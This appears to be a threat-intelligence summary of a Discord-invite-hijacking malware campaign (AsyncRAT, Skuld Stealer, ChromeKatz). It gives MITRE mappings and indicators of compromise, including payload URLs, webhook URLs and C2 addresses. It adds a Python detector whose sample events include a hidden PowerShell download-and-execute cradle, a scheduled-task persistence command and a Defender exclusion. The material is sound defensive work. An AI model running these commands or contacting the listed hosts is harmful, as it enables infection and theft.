From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery

Check Point Research discovered a sophisticated malware campaign that exploits expired and deleted Discord invite links to redirect users to attacker-controlled servers and deliver payloads such as AsyncRAT and a modified Skuld Stealer targeting cryptocurrency wallets. The attackers use multi-stage loaders, trusted cloud services, and evasion techniques, including ChromeKatz, to steal data while remaining stealthy. #AsyncRAT #SkuldStealer #DiscordInviteHijacking #ChromeKatz

Keypoints

  • Expired and deleted Discord invite links can be hijacked by attackers through vanity link registration, redirecting users to malicious Discord servers.
  • The campaign uses a multi-stage infection chain starting with a phishing technique called ClickFix, leading to PowerShell downloaders that fetch payloads from GitHub, Bitbucket, and Pastebin.
  • Delivered payloads include AsyncRAT, a remote access Trojan, and a customized version of Skuld Stealer targeting browser credentials and cryptocurrency wallets such as Exodus and Atomic.
  • Skuld Stealer uses Discord webhooks to exfiltrate stolen data, including injecting malicious JavaScript into cryptocurrency wallet applications to steal seed phrases and passwords.
  • The campaign employs sandbox evasion techniques, delayed execution via scheduled tasks, and XOR-based payload encryption to avoid detection.
  • Attackers adapted ChromeKatz to bypass Chrome’s Application-Bound Encryption (ABE) in newer Chromium browsers to steal cookies directly from browser memory.
  • Another related campaign targets gamers of The Sims 4 using a Trojanized hacktool distributed via Bitbucket, using the same loader and payloads.

MITRE Techniques

  • [T1566] Phishing – Attackers use hijacked Discord invite links combined with a ClickFix phishing technique to deceive users into executing malicious PowerShell commands (‘ClickFix phishing technique, a fake Google CAPTCHA… prompting the user to open Windows Run dialog and execute a command’).
  • [T1204] User Execution – Social engineering is used to trick victims into running a malicious PowerShell command that downloads malware (‘Clicking “Verify” silently copies a malicious PowerShell command to the clipboard’).
  • [T1041] Exfiltration Over C2 Channel – Skuld Stealer exfiltrates collected data via Discord webhooks, a one-way communication method used as command and control (‘Skuld sends collected data through a Discord webhook…’).
  • [T1053] Scheduled Task/Job – Persistence and delayed execution are ensured by scheduled tasks that run malicious scripts every five minutes (‘Scheduled task named checker runs the second script runsys.vbs every 5 minutes’).
  • [T1105] Ingress Tool Transfer – Downloaders retrieve payloads from trusted cloud services like GitHub, Bitbucket, and Pastebin (‘Downloads payloads using URLs from Bitbucket, GitHub, and Pastebin’).
  • [T1027] Obfuscated Files or Information – Malware strings and API calls are obfuscated using XOR encryption and junk code to evade static analysis (‘Critical strings related to malicious functionality are concealed using XOR cipher and junk code’).
  • [T1218] Signed Binary Proxy Execution – PowerShell and Windows scripting are used to execute payloads stealthily (‘PowerShell script downloads and executes malicious binaries with hidden console window’).
  • [T1557] Man-in-the-Middle – HTTPS redirection and OAuth2 flows are leveraged to capture user credentials on a phishing website mimicking Discord (‘Phishing website uses OAuth2 authentication to get user data and display fake verification’).
  • [T1056] Input Capture – Skuld Stealer intercepts Discord tokens and browser credentials, as well as cryptocurrency wallet input (‘Discord injection module intercepts sensitive user operations such as login, password changes’).
  • [T1083] File and Directory Discovery – Malware discovers browser versions and paths for injecting code and stealing data (‘Stealer determines the browser version using GetFileVersionInfoW for injection targeting’).
  • [T1113] Screen Capture – AsyncRAT features include screen capturing capabilities (‘AsyncRAT provides keylogging and screen capturing functionality’).
  • [T1624] Hide Artifacts – Malware adds exclusion paths to Windows Defender to evade detection (‘nat1.vbs script adds user directory to Defender exclusion paths’).
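As an added, defender-side example (not code from the Check Point report), the following Python classifier applies the behaviours listed above to process-creation events: a PowerShell download cradle launched from the Run dialog (parent explorer.exe) with a hidden window and a Pastebin/GitHub/Bitbucket URL, a short-interval scheduled task running a .vbs script, and a Windows Defender exclusion being added. The event fields, command lines and URLs are constructed for illustration and are not indicators from the report.

```python
import re

# Constructed sample events in a Sysmon Event ID 1-like shape (not from the report).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr https://pastebin.com/raw/EXAMPLE)"'},
    {"parent": "cmd.exe", "image": "schtasks.exe",
     "cmd": 'schtasks /create /sc minute /mo 5 /tn checker /tr "wscript.exe C:\\Users\\u\\runsys.vbs"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -c "Get-Date"'},                       # benign Run-dialog use
    {"parent": "services.exe", "image": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"parent": "wscript.exe", "image": "powershell.exe",        # script adding a Defender exclusion
     "cmd": 'powershell -c "Add-MpPreference -ExclusionPath C:\\Users\\u"'},
]

# Hosting services the report names as payload sources.
CLOUD_HOSTS = re.compile(
    r"(pastebin\.com/raw|github\.com/.+/raw|raw\.githubusercontent\.com|bitbucket\.org/.+/downloads)", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I)       # hidden console window
CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression)\b", re.I)
SHORT_TASK = re.compile(r"/sc\s+minute\s+/mo\s+\d+.*\.vbs", re.I)  # minute-interval task running a .vbs
EXCLUSION = re.compile(r"add-mppreference\s+-exclusionpath", re.I)

def classify(ev):
    """Return the list of detection names that fire for one process-creation event."""
    findings = []
    cmd, image, parent = ev["cmd"], ev["image"].lower(), ev["parent"].lower()
    if image == "powershell.exe":
        # ClickFix: the Run dialog is hosted by explorer.exe, so a hidden-window or
        # download-cradle PowerShell child of explorer.exe is the key signal.
        if parent == "explorer.exe" and (HIDDEN.search(cmd) or CRADLE.search(cmd)):
            findings.append("clickfix_runbox_powershell")
        if CLOUD_HOSTS.search(cmd) and CRADLE.search(cmd):
            findings.append("cloud_hosted_download_cradle")
        if EXCLUSION.search(cmd):
            findings.append("defender_exclusion_added")
    if image == "schtasks.exe" and SHORT_TASK.search(cmd):
        findings.append("short_interval_script_task")
    return findings

def scan(events):
    """Map event index -> findings for every event that triggered at least one detection."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], hits)
```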

Indicators of Compromise

  • [SHA256 Hash] Malware samples – 673090abada8ca47419a5dbc37c5443fe990973613981ce622f30e83683dc932 (First Stage Downloader), 160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693 (Downloader Newer Variant), 53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe (AsyncRAT payload), 8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c (Skuld Stealer payload), f08676eeb489087bc0e47bd08a3f7c4b57ef5941698bc09d30857c650763859c (ChromeKatz payload).
  • [Domains] Phishing and malware hosting – captchaguard[.]me (phishing site), pastebin[.]com/raw/zW0L2z2M (PowerShell script), github[.]com/frfs1/update/raw/refs/heads/main/installer.exe (downloader), bitbucket[.]org/syscontrol6/syscontrol/downloads/skul.exe (Skuld stealer).
  • [Discord Webhooks] Data exfiltration – https://discord[.]com/api/webhooks/1355186248578502736/RDywhK6GQKXiM5T05ueXSSjYopg9nY6XFJo1o5Jnz6v9sih59A8p-6HkndInOTicO, https://discord[.]com/api/webhooks/1348629600560742462/RJgSAE7cYY-1eKMkl5EI-qZMuHaujnRBMVU8zcIaMKyQi4mCVjc9R0zhDQ7wmPoD7Xp.
  • [IP Addresses] C2 Servers – 101.99.76.120:7707, 87.120.127.37:7707, 185.234.247.8:7707.


Read more: https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
